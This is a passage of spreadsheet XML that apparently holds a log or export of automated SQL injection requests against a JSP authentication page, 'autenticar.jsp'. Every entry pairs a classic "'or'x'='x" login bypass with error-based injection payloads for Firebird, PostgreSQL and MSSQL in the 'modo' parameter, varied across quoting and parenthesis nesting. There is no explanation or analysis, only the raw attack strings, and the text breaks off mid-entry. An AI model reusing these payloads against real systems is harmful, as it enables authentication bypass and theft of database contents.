    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and"zaqx"like"zaqx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-500</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5805)or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7195</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5007')or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1096</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-991'or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5735</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4958"or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1166</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3594)or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(3606=3606</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6875</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-819))or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and((2375=2375</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6203</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3978)))or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(((453=453</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9993</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8773or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1331</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7878')or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and('qisk'='qisk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7319</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1678'))or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(('jdrr'='jdrr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4450</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9878')))or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and((('kjkm'='kjkm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2023</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2822'or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and'pldk'='pldk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-492</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2723')or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and('fvpi'like'fvpi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-411</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3427'))or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(('dttq'like'dttq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8957</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6562')))or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and((('jbzt'like'jbzt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7995</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9975'or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and'qune'like'qune</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4517</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4064")or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and("huwo"="huwo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1448</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2482"))or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(("ease"="ease</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5972</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5625")))or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and((("wnkw"="wnkw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9458</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3134"or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and"jnxl"="jnxl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4666</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7521")or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and("fnba"like"fnba</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3290</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5993"))or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(("fujv"like"fujv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4764</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5062")))or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and((("dzhh"like"dzhh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6978</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5121"or2659=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(2659=2659)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and"oxkz"like"oxkz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5373</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7577)or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-754</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5980')or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1701</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9809'or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6377</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1068"or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3587</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7919)or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(4389=4389</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1779</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9962))or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((8500=8500</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-854</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7636)))or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(((6552=6552</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1110</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3306or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8435</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7866')or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and('bpos'='bpos</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3025</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2788'))or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(('rvva'='rvva</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6021</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8406')))or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((('ijdi'='ijdi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4244</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9642'or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and'sote'='sote</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-735</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4790')or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and('opqr'like'opqr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1309</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5437'))or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(('rcdv'like'rcdv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-883</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1428')))or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((('ncsx'like'ncsx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9349</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2537'or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and'lbdq'like'lbdq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8222</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7042")or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and("lapy"="lapy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9900</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5319"))or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(("ojdm"="ojdm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8386</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6833")))or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((("svss"="svss</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5569</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2779"or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and"wcur"="wcur</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7493</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5147")or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and("uuik"like"uuik</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-388</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2591"))or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(("lqkf"like"lqkf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9756</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3437")))or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((("cnhl"like"cnhl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3072</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2110"or281=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(281=281)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and"qxei"like"qxei</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3583</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-939)or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8461</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2203')or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3429</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9428'or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4950</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5135"or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9974</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4210)or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(5513=5513</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8657</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9596))or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((4414=4414</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4690</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2407)))or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(((5491=5491</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5287</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7184or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1542</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-596')or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and('ysee'='ysee</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3095'))or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(('mfld'='mfld</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-338</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8847')))or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((('wpqt'='wpqt</t>
  </si>
  <si>
